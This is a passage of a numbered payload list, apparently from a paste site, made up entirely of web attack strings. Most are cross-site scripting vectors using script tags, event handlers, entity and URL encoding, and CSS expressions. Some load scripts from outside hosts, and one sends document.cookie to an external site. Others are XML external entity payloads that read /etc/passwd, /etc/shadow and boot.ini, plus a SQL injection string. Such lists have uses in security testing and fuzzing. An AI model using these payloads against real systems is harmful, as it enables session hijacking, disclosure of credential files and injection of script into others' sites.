  1363. <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
  1364. <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
  1365. <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
  1366. <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
  1367. <a href="javascript#document.vulnerable=true;">
  1368. <div onmouseover="document.vulnerable=true;">
  1369. <img src="javascript:document.vulnerable=true;">
  1370. <img dynsrc="javascript:document.vulnerable=true;">
  1371. <input type="image" dynsrc="javascript:document.vulnerable=true;">
  1372. <bgsound src="javascript:document.vulnerable=true;">
  1373. &<script>document.vulnerable=true;</script>
  1374. &{document.vulnerable=true;};
  1375. <img src=&{document.vulnerable=true;};>
  1376. <link rel="stylesheet" href="javascript:document.vulnerable=true;">
  1377. <iframe src="vbscript:document.vulnerable=true;">
  1378. <img src="mocha:document.vulnerable=true;">
  1379. <img src="livescript:document.vulnerable=true;">
  1380. <a href="about:<script>document.vulnerable=true;</script>">
  1381. <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
  1382. <body onload="document.vulnerable=true;">
  1383. <div style="background-image: url(javascript:document.vulnerable=true;);">
  1384. <div style="behaviour: url([link to code]);">
  1385. <div style="binding: url([link to code]);">
  1386. <div style="width: expression(document.vulnerable=true;);">
  1387. <style type="text/javascript">document.vulnerable=true;</style>
  1388. <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
  1389. <style><!--</style><script>document.vulnerable=true;//--></script>
  1390. <<script>document.vulnerable=true;</script>
  1391. <![<!--]]<script>document.vulnerable=true;//--></script>
  1392. <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
  1393. <img src="blah"onmouseover="document.vulnerable=true;">
  1394. <img src="blah>" onmouseover="document.vulnerable=true;">
  1395. <xml src="javascript:document.vulnerable=true;">
  1396. <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
  1397. <div datafld="b" dataformatas="html" datasrc="#X"></div>
  1398. [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
  1399. <style>@import'http://www.securitycompass.com/xss.css';</style>
  1400. <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
  1401. <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
  1402. <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
  1403. <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
  1404. <script SRC="http://www.securitycompass.com/xss.jpg"></script>
  1405. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
  1406. <script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
  1407. <script =">" SRC="http://www.securitycompass.com/xss.js"></script>
  1408. <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
  1409. <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
  1410. <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
  1411. <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
  1412. <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
  1413. <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
  1414. ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
  1415. <;/script>;<;script>;alert(1)<;/script>;
  1416. <;/br style=a:expression(alert())>;
  1417. <;scrscriptipt>;alert(1)<;/scrscriptipt>;
  1418. <;br size=\";&;{alert(&#039;XSS&#039;)}\";>;
  1419. perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out
  1420. perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out
  1421. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1422. <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
  1423. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1424. <~/XSS STYLE=xss:expression(alert('XSS'))>
  1425. "><script>alert('XSS')</script>
  1426. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1427. XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
  1428. XSS STYLE=xss:e/**/xpression(alert('XSS'))>
  1429. </XSS STYLE=xss:expression(alert('XSS'))>
  1430. >"><script>alert("XSS")</script>&
  1431. "><STYLE>@import"javascript:alert('XSS')";</STYLE>
  1432. >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
  1433. >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22>
  1434. '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
  1435. ">
  1436. >"
  1437. '';!--"<XSS>=&{()}
  1438. <IMG SRC="javascript:alert('XSS');">
  1439. <IMG SRC=javascript:alert('XSS')>
  1440. <IMG SRC=JaVaScRiPt:alert('XSS')>
  1441. <IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)>
  1442. <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41>
  1443. <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041>
  1444. <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29>
  1445. <IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');">
  1446. <IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');">
  1447. <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
  1448. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  1449. <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof>
  1450. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo>
  1451. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
  1452. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo>
  1453. <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>
  1454. <script>alert('XSS')</script>
  1455. %3cscript%3ealert('XSS')%3c/script%3e
  1456. %22%3e%3cscript%3ealert('XSS')%3c/script%3e
  1457. <IMG SRC="javascript:alert('XSS');">
  1458. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  1459. <IMG SRC=javascript:alert('XSS')>
  1460. <img src=xss onerror=alert(1)>
  1461. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  1462. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  1463. <IMG SRC="jav ascript:alert('XSS');">
  1464. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  1465. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  1466. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  1467. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  1468. <BODY BACKGROUND="javascript:alert('XSS')">
  1469. <BODY ONLOAD=alert('XSS')>
  1470. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  1471. <IMG SRC="javascript:alert('XSS')"
  1472. <iframe src=http://ha.ckers.org/scriptlet.html <
  1473. <<SCRIPT>alert("XSS");//<</SCRIPT>
  1474. %253cscript%253ealert(1)%253c/script%253e
  1475. "><s"%2b"cript>alert(document.cookie)</script>
  1476. foo<script>alert(1)</script>
  1477. <scr<script>ipt>alert(1)</scr</script>ipt>
  1478. <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
Add Comment
Please, Sign In to add comment